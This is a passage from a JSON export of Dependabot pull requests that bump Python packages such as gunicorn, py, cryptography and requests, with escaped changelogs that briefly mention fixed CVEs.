CVE-2024-1135\u003c/p\u003e\n\u003ch2\u003eGunicorn 22.0 has been released\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eGunicorn 22.0.0 has been released.\u003c/strong\u003e This version fix the numerous security vulnerabilities. You're invited to upgrade asap your own installation.\u003c/p\u003e\n\u003cp\u003eChanges:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e22.0.0 - 2024-04-17\n===================\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003eutime\u003c/code\u003e to notify workers liveness\u003c/li\u003e\n\u003cli\u003emigrate setup to pyproject.toml\u003c/li\u003e\n\u003cli\u003efix numerous security vulnerabilities in HTTP parser (closing some request smuggling vectors)\u003c/li\u003e\n\u003cli\u003eparsing additional requests is no longer attempted past unsupported request framing\u003c/li\u003e\n\u003cli\u003eon HTTP versions \u0026lt; 1.1 support for chunked transfer is refused (only used in exploits)\u003c/li\u003e\n\u003cli\u003erequests conflicting configured or passed SCRIPT_NAME now produce a verbose error\u003c/li\u003e\n\u003cli\u003eTrailer fields are no longer inspected for headers indicating secure scheme\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/411986d6191114dd1d1bbb9c72c948dbf0ef0425\"\u003e\u003ccode\u003e411986d\u003c/code\u003e\u003c/a\u003e fix doc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/334392e7795f2017e83f7054d372422512d6f4b6\"\u003e\u003ccode\u003e334392e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/2559\"\u003e#2559\u003c/a\u003e from laggardkernel/bugfix/reexec-env\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/e75c3533e32f91a9dceba9e8e1341fea5540ba81\"\u003e\u003ccode\u003ee75c353\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/benoitc/gunicorn/issues/3189\"\u003e#3189\u003c/a\u003e from pajod/patch-py36\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/9357b28dd867950e33ca3864207cb35a1eb8ba6f\"\u003e\u003ccode\u003e9357b28\u003c/code\u003e\u003c/a\u003e keep document user in access_log_format setting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/commit/79fdef0822cbfe7e16b659b07230af9be098d5fc\"\u003e\u003ccode\u003e79fdef0\u003c/code\u003e\u003c/a\u003e bump to 23.0.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/benoitc/gunicorn/com...\n\n_Description has been truncated_","html_url":"https://github.com/voolitels/ichnaea/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/voolitels%2Fichnaea/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"}},{"old_version":"1.8.0","new_version":"1.11.0","update_type":"minor","path":"/api/server/tests-py","pr_created_at":"2025-08-08T22:23:09.000Z","version_change":"1.8.0 → 1.11.0","issue":{"uuid":"2731880369","node_id":"PR_kwDODdGf3s6i1S-x","number":24,"state":"open","title":"Bump py from 1.8.0 to 1.11.0 in /api/server/tests-py","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"CONTRIBUTOR","state_reason":null,"created_at":"2025-08-08T22:23:09.000Z","updated_at":"2025-08-08T22:23:10.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","packages":[{"name":"py","old_version":"1.8.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"}],"path":"/api/server/tests-py","ecosystem":"pip"},"body":"Bumps [py](https://github.com/pytest-dev/py) from 1.8.0 to 1.11.0.\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.1 (2019-12-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eHandle \u003ccode\u003eFileNotFoundError\u003c/code\u003e when trying to import pathlib in \u003ccode\u003epath.common\u003c/code\u003e\non Python 3.4 (\u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/207\"\u003e#207\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003epy.path.local.samefile\u003c/code\u003e now works correctly in Python 3 on Windows when dealing with symlinks.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.8.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=py\u0026package-manager=pip\u0026previous-version=1.8.0\u0026new-version=1.11.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/BootcampersCollective/job-scraper/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/BootcampersCollective/job-scraper/pull/24","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/BootcampersCollective%2Fjob-scraper/issues/24","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/24/packages"}},{"old_version":"1.10.0","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-07-29T08:54:28.000Z","version_change":"1.10.0 → 1.11.0","issue":{"uuid":"2703325852","node_id":"PR_kwDOHEePGc6hIXqc","number":1648,"state":"closed","title":"build(deps): bump the pip group across 1 directory with 4 updates","user":"dependabot[bot]","labels":["dependencies","python","stale"],"assignees":["melissamforbs"],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2025-08-21T08:26:58.000Z","author_association":"NONE","state_reason":null,"created_at":"2025-07-29T08:54:28.000Z","updated_at":"2025-08-21T08:26:58.000Z","time_to_close":1985550,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"pip","update_count":4,"packages":[{"name":"cryptography","old_version":"43.0.1","new_version":"44.0.1","repository_url":"https://github.com/pyca/cryptography"},{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.32.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"urllib3","old_version":"1.26.19","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 4 updates in the /binary-option/client directory: [cryptography](https://github.com/pyca/cryptography), [py](https://github.com/pytest-dev/py), [requests](https://github.com/psf/requests) and [urllib3](https://github.com/urllib3/urllib3).\n\nUpdates `cryptography` from 43.0.1 to 44.0.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst\"\u003ecryptography's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e44.0.1 - 2025-02-11\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Updated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.1.\n* We now build ``armv7l`` ``manylinux`` wheels and publish them to PyPI.\n* We now build ``manylinux_2_34`` wheels and publish them to PyPI.\n\u003cp\u003e.. _v44-0-0:\u003c/p\u003e\n\u003cp\u003e44.0.0 - 2024-11-27\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBACKWARDS INCOMPATIBLE:\u003c/strong\u003e Dropped support for LibreSSL \u0026lt; 3.9.\u003c/li\u003e\n\u003cli\u003eDeprecated Python 3.7 support. Python 3.7 is no longer supported by the\nPython core team. Support for Python 3.7 will be removed in a future\n\u003ccode\u003ecryptography\u003c/code\u003e release.\u003c/li\u003e\n\u003cli\u003eUpdated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.0.\u003c/li\u003e\n\u003cli\u003emacOS wheels are now built against the macOS 10.13 SDK. Users on older\nversions of macOS should upgrade, or they will need to build\n\u003ccode\u003ecryptography\u003c/code\u003e themselves.\u003c/li\u003e\n\u003cli\u003eEnforce the :rfc:\u003ccode\u003e5280\u003c/code\u003e requirement that extended key usage extensions must\nnot be empty.\u003c/li\u003e\n\u003cli\u003eAdded support for timestamp extraction to the\n:class:\u003ccode\u003e~cryptography.fernet.MultiFernet\u003c/code\u003e class.\u003c/li\u003e\n\u003cli\u003eRelax the Authority Key Identifier requirements on root CA certificates\nduring X.509 verification to allow fields permitted by :rfc:\u003ccode\u003e5280\u003c/code\u003e but\nforbidden by the CA/Browser BRs.\u003c/li\u003e\n\u003cli\u003eAdded support for :class:\u003ccode\u003e~cryptography.hazmat.primitives.kdf.argon2.Argon2id\u003c/code\u003e\nwhen using OpenSSL 3.2.0+.\u003c/li\u003e\n\u003cli\u003eAdded support for the :class:\u003ccode\u003e~cryptography.x509.Admissions\u003c/code\u003e certificate extension.\u003c/li\u003e\n\u003cli\u003eAdded basic support for PKCS7 decryption (including S/MIME 3.2) via\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_der\u003c/code\u003e,\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_pem\u003c/code\u003e, and\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_smime\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-3:\u003c/p\u003e\n\u003cp\u003e43.0.3 - 2024-10-18\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Fixed release metadata for ``cryptography-vectors``\n\u003cp\u003e.. _v43-0-2:\u003c/p\u003e\n\u003cp\u003e43.0.2 - 2024-10-18\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed compilation when using LibreSSL 4.0.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-1:\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/adaaaed77db676bbaa9d171175db81dce056e2a7\"\u003e\u003ccode\u003eadaaaed\u003c/code\u003e\u003c/a\u003e Bump for 44.0.1 release (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12441\"\u003e#12441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/ccc61dabe38b86956bf218565cd4e82b918345a1\"\u003e\u003ccode\u003eccc61da\u003c/code\u003e\u003c/a\u003e [backport] test and build on armv7l (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12420\"\u003e#12420\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12431\"\u003e#12431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f299a48153650f2dd87716343f2daa7cd39a1f59\"\u003e\u003ccode\u003ef299a48\u003c/code\u003e\u003c/a\u003e remove deprecated call (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12052\"\u003e#12052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/439eb0594a9ffb7c9adedb2490998d83914d141e\"\u003e\u003ccode\u003e439eb05\u003c/code\u003e\u003c/a\u003e Bump version for 44.0.0 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12051\"\u003e#12051\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/2c5ad4d8dcec1b8f833198bc2f3b4634c4fd9d78\"\u003e\u003ccode\u003e2c5ad4d\u003c/code\u003e\u003c/a\u003e chore(deps): bump maturin from 1.7.4 to 1.7.5 in /.github/requirements (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12050\"\u003e#12050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/d23968adddd79aa8508d7c1f985da09383b3808f\"\u003e\u003ccode\u003ed23968a\u003c/code\u003e\u003c/a\u003e chore(deps): bump libc from 0.2.165 to 0.2.166 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12049\"\u003e#12049\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/133c0e02edf2f172318eb27d8f50525ed64c9ec3\"\u003e\u003ccode\u003e133c0e0\u003c/code\u003e\u003c/a\u003e Bump x509-limbo and/or wycheproof in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12047\"\u003e#12047\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f2259d7aa0d134c839ebe298baa8b63de9ead804\"\u003e\u003ccode\u003ef2259d7\u003c/code\u003e\u003c/a\u003e Bump BoringSSL and/or OpenSSL in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12046\"\u003e#12046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/e201c870b89fd2606d67230a97e50c3badb07907\"\u003e\u003ccode\u003ee201c87\u003c/code\u003e\u003c/a\u003e fixed metadata in changelog (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12044\"\u003e#12044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/c6104cc3669585941dc1d2b9c6507621c53d242f\"\u003e\u003ccode\u003ec6104cc\u003c/code\u003e\u003c/a\u003e Prohibit Python 3.9.0, 3.9.1 -- they have a bug that causes errors (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12045\"\u003e#12045\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pyca/cryptography/compare/43.0.1...44.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.32.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's 